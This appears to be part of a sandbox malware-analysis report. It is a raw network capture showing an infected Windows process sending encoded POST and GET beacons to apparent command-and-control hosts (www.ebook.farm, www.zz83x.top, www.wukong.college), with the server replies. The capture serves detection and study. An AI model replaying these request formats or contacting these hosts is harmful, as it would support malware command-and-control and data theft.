4d 67 73 2b 61 34 55 56 76 76 4e 52 6d 67 49 57 4b 44 56 4d 34 53 7a 71 6e 52 75 38 70 35 68 4b 32 4d 5a 61 35 52 39 4e 30 63 46 6c 2f 44 4e 69 36 66 50 6f 50 39 32 71 6f 64 2f 78 6d 54 6b 61 62 61 52 67 31 47 5a 36 42 6d 4d 51 4d 38 4e 59 4a 6c 6f 30 70 6f 58 57 36 63 75 30 31 6d 2b 4c 48 73 55 6f 53 36 4b 46 30 68 70 72 43 65 5a 61 7a 4c 45 57 44 45 6b 74 6c 4f 75 78 71 4b 52 57 45 77 3d Data Ascii: mRu=f5tiCBkTO6WWK5Tp1sF2PFRo9enkkpTWdyM+3vAhHhHILHBaHqeJFV8rAOLV26eGm/mo3eM6gozX/KfJWJDTsMgs+a4UVvvNRmgIWKDVM4SzqnRu8p5hK2MZa5R9N0cFl/DNi6fPoP92qod/xmTkabaRg1GZ6BmMQM8NYJlo0poXW6cu01m+LHsUoS6KF0hprCeZazLEWDEktlOuxqKRWEw=
Nov 12, 2024 15:33:22.757242918 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:22 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 5b9c4b87-37f6-4a92-a502-3db43dec3d3e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw== set-cookie: parking_session=5b9c4b87-37f6-4a92-a502-3db43dec3d3e; expires=Tue, 12 Nov 2024 14:48:22 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:22.757293940 CET	510	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWI5YzRiODctMzdmNi00YTkyLWE1MDItM2RiNDNkZWMzZDNlIiwicGFnZV90aW1lIjoxNzMxNDIyMDAyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	49778	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:25.272731066 CET	2578	OUT	POST /rzaq/ HTTP/1.1 Host: www.ebook.farm Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ebook.farm Referer: http://www.ebook.farm/rzaq/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 4b 35 54 70 31 73 46 32 50 46 52 6f 39 65 6e 6b 6b 70 54 57 64 79 4d 2b 33 76 41 68 48 68 50 49 4c 79 56 61 47 4a 32 4a 45 56 38 72 4a 75 4c 55 32 36 65 68 6d 2f 2b 6b 33 65 41 71 67 72 4c 58 74 34 58 4a 65 64 58 54 6e 4d 67 73 38 61 34 52 4b 2f 75 56 52 6d 77 45 57 4b 54 56 4d 34 53 7a 71 6c 4a 75 37 38 5a 68 46 57 4d 47 54 5a 51 38 66 45 63 2b 6c 38 7a 33 69 36 72 31 6f 2f 64 32 71 49 4e 2f 7a 53 7a 6b 46 72 61 54 7a 46 47 52 36 42 36 54 51 4d 77 72 59 4a 52 4f 30 75 30 58 56 63 64 6f 77 31 79 48 55 68 6b 6a 71 32 75 7a 52 58 6c 43 31 51 61 47 55 52 62 37 56 54 51 53 6e 45 4b 2b 69 71 69 6e 4e 77 57 55 5a 52 4f 71 39 57 45 49 53 37 65 46 49 51 30 69 4e 37 59 78 31 79 5a 65 6c 63 74 4a 6a 61 78 55 4c 71 6b 31 77 41 4a 41 77 6b 59 67 78 47 4c 33 35 41 43 49 4f 4e 37 42 48 6b 2b 59 72 70 38 4b 63 4e 79 6d 30 50 4c 73 5a 7a 2b 6b 38 76 72 47 69 56 66 57 6b 74 4a 42 55 55 45 68 33 45 68 71 71 6d 58 4f 30 4c 30 30 6f 61 39 47 53 71 69 78 42 53 68 57 38 33 [TRUNCATED] Data Ascii: mRu=f5tiCBkTO6WWK5Tp1sF2PFRo9enkkpTWdyM+3vAhHhPILyVaGJ2JEV8rJuLU26ehm/+k3eAqgrLXt4XJedXTnMgs8a4RK/uVRmwEWKTVM4SzqlJu78ZhFWMGTZQ8fEc+l8z3i6r1o/d2qIN/zSzkFraTzFGR6B6TQMwrYJRO0u0XVcdow1yHUhkjq2uzRXlC1QaGURb7VTQSnEK+iqinNwWUZROq9WEIS7eFIQ0iN7Yx1yZelctJjaxULqk1wAJAwkYgxGL35ACION7BHk+Yrp8KcNym0PLsZz+k8vrGiVfWktJBUUEh3EhqqmXO0L00oa9GSqixBShW833kwCneNC+Yorx0zAYDS9A5+D/ZfNif2jeHCZg55IrOo7/SLg+FeYA0QL0BKPYCPTF9bZPfxTK3PMo4KZF3L3aqMQOdb7q8QyyyxPSotj3ty6VHXJA4K2CeG9xBicW4/SPuf+dtIvsiuQAXt5jk+rWgcD8OqnQX2hVUpzFTULKGlbb4zdEoA+Uwdvklp242HCBcGSkeLX8LPT4xGzdlOLNRcwc6tybMMe8yVDoAIQhOaNZY8YvcppDOzRc8JEDe6KItsfeLZzFTOJ92vI5kOtJ7IXZrjJUANHcbzV4nQ1brN4Fp/BGe9Txq5ezJ+cO99E5Kqufb5it/sZ9p5e14DFKKVR4NWhDhgTPrtBTnqElRyVvofBtQ5F8p6WTv51qAZNTYQFn3ER8WWbDffGOqqnYHBBxmwsEAmfRlubztiL1VWbQtqchItFZwqnSxfpyMYuKHYTu0dPTfGEA/WW2vJMoEuIzTu/DpNSSRNkHM1+i1It5qd2EU7nIHH9cSzyB0KdcUlGqqiyXs2Dh7ooCmtleG0TpGiVmDwQ6pi+PSMXMrLSs51Va0oXXqrHnCd2rrw6I4Jtc8sedKczTEFn2CyJ4oyOias9bLWlZ9SzFqECZoa+E14jh69AfV4nYZOdKtkPFzyqWYCkiQbqWjyaYu2dVhngE3yqYlG8Su [TRUNCATED]
Nov 12, 2024 15:33:25.272809982 CET	5332	OUT	Data Raw: 56 59 42 41 6a 43 33 74 42 4b 70 62 77 44 31 63 75 45 4e 74 4e 30 65 4a 74 79 41 48 56 35 53 2f 78 4c 35 6f 55 6c 59 30 7a 46 72 42 67 4a 6d 76 66 42 37 43 78 36 6b 59 4e 72 68 55 4c 35 67 66 48 4d 6d 51 71 66 4f 67 4d 2b 31 36 43 39 52 32 64 71 Data Ascii: VYBAjC3tBKpbwD1cuENtN0eJtyAHV5S/xL5oUlY0zFrBgJmvfB7Cx6kYNrhUL5gfHMmQqfOgM+16C9R2dqzdYp/Zu/mvSD6ZMi7wRDqL1oGfX0S9BaZcoAKDiJ3KVDRCV5vCrZ//rppgObWLnRPcJ5h9NdIesr1tiMUAdZugt2iTaAxDx/4aV+o/GfduHJLgzZ5+9WOjWogwaNTueaS0Yi8yScflj4l5Zny7h9u83qThVxyzY8y
Nov 12, 2024 15:33:25.407622099 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:24 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 313ecf32-c24b-4851-b43a-b7a3e5afaab3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw== set-cookie: parking_session=313ecf32-c24b-4851-b43a-b7a3e5afaab3; expires=Tue, 12 Nov 2024 14:48:25 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:25.407639027 CET	510	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzEzZWNmMzItYzI0Yi00ODUxLWI0M2EtYjdhM2U1YWZhYWIzIiwicGFnZV90aW1lIjoxNzMxNDIyMDA1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.11.20	49779	199.59.243.227	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:27.940453053 CET	473	OUT	GET /rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM HTTP/1.1 Host: www.ebook.farm Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:33:28.075597048 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:27 GMT content-type: text/html; charset=utf-8 content-length: 1438 x-request-id: ba442f54-a3f4-4968-b738-892d2a18b930 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FDDVJK0xp41bVVAlunYPLIzPiti/Lc71sRgoxPw9fMkavBHzD0Nr835Zy+NFy1zMWJQQm8/5R6P9hopVFy2viQ== set-cookie: parking_session=ba442f54-a3f4-4968-b738-892d2a18b930; expires=Tue, 12 Nov 2024 14:48:28 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 44 44 56 4a 4b 30 78 70 34 31 62 56 56 41 6c 75 6e 59 50 4c 49 7a 50 69 74 69 2f 4c 63 37 31 73 52 67 6f 78 50 77 39 66 4d 6b 61 76 42 48 7a 44 30 4e 72 38 33 35 5a 79 2b 4e 46 79 31 7a 4d 57 4a 51 51 6d 38 2f 35 52 36 50 39 68 6f 70 56 46 79 32 76 69 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FDDVJK0xp41bVVAlunYPLIzPiti/Lc71sRgoxPw9fMkavBHzD0Nr835Zy+NFy1zMWJQQm8/5R6P9hopVFy2viQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:28.075615883 CET	838	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmE0NDJmNTQtYTNmNC00OTY4LWI3MzgtODkyZDJhMThiOTMwIiwicGFnZV90aW1lIjoxNzMxNDIyMDA4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.11.20	49780	206.119.81.121	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:36.489474058 CET	472	OUT	GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1 Host: www.zz83x.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:33:36.804577112 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 14:33:36 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66f0ea70-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.11.20	49781	47.52.221.8	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:42.142107010 CET	753	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==
Nov 12, 2024 15:33:42.465173960 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:33:42 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.11.20	49782	47.52.221.8	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:45.002990961 CET	773	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 71 4e 4b 4d 6f 6b 2b 38 4b 59 50 62 58 49 74 30 4b 44 6e 74 50 49 75 4f 75 35 47 2f 63 61 63 79 57 66 6f 2b 39 47 54 63 49 57 55 54 4b 76 6f 38 46 65 4a 47 39 41 57 47 79 62 69 42 63 6f 44 47 4f 51 62 5a 68 63 70 4e 49 68 33 52 7a 4f 2b 6b 5a 72 4a 6f 49 6a 37 37 37 44 34 38 4f 50 41 6c 51 4d 38 4c 52 62 4a 51 51 53 30 68 54 35 4a 31 4e 41 33 52 75 51 68 55 41 6d 71 4e 44 38 2b 30 55 77 77 66 4a 32 48 30 59 61 76 38 59 79 4b 79 44 4b 79 76 7a 59 57 35 4a 56 2f 6f 74 75 33 4d 39 6e 47 61 33 46 4e 54 35 72 56 4f 38 3d Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjqNKMok+8KYPbXIt0KDntPIuOu5G/cacyWfo+9GTcIWUTKvo8FeJG9AWGybiBcoDGOQbZhcpNIh3RzO+kZrJoIj777D48OPAlQM8LRbJQQS0hT5J1NA3RuQhUAmqND8+0UwwfJ2H0Yav8YyKyDKyvzYW5JV/otu3M9nGa3FNT5rVO8=
Nov 12, 2024 15:33:45.323919058 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:33:45 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.11.20	49783	47.52.221.8	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:47.860832930 CET	1289	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 69 4e 4c 36 38 6b 73 4d 32 59 4f 62 58 49 6e 55 4b 41 6e 74 50 52 75 50 47 39 47 2f 68 6c 63 30 61 66 70 63 31 47 48 39 49 57 44 6a 4b 76 71 38 46 66 4e 47 39 56 57 47 69 66 69 42 4d 6f 44 47 4f 51 62 61 70 63 67 38 49 68 37 78 7a 4e 37 6b 5a 76 59 59 49 4c 37 37 69 32 34 38 61 31 48 57 49 4d 2f 72 68 62 45 43 49 53 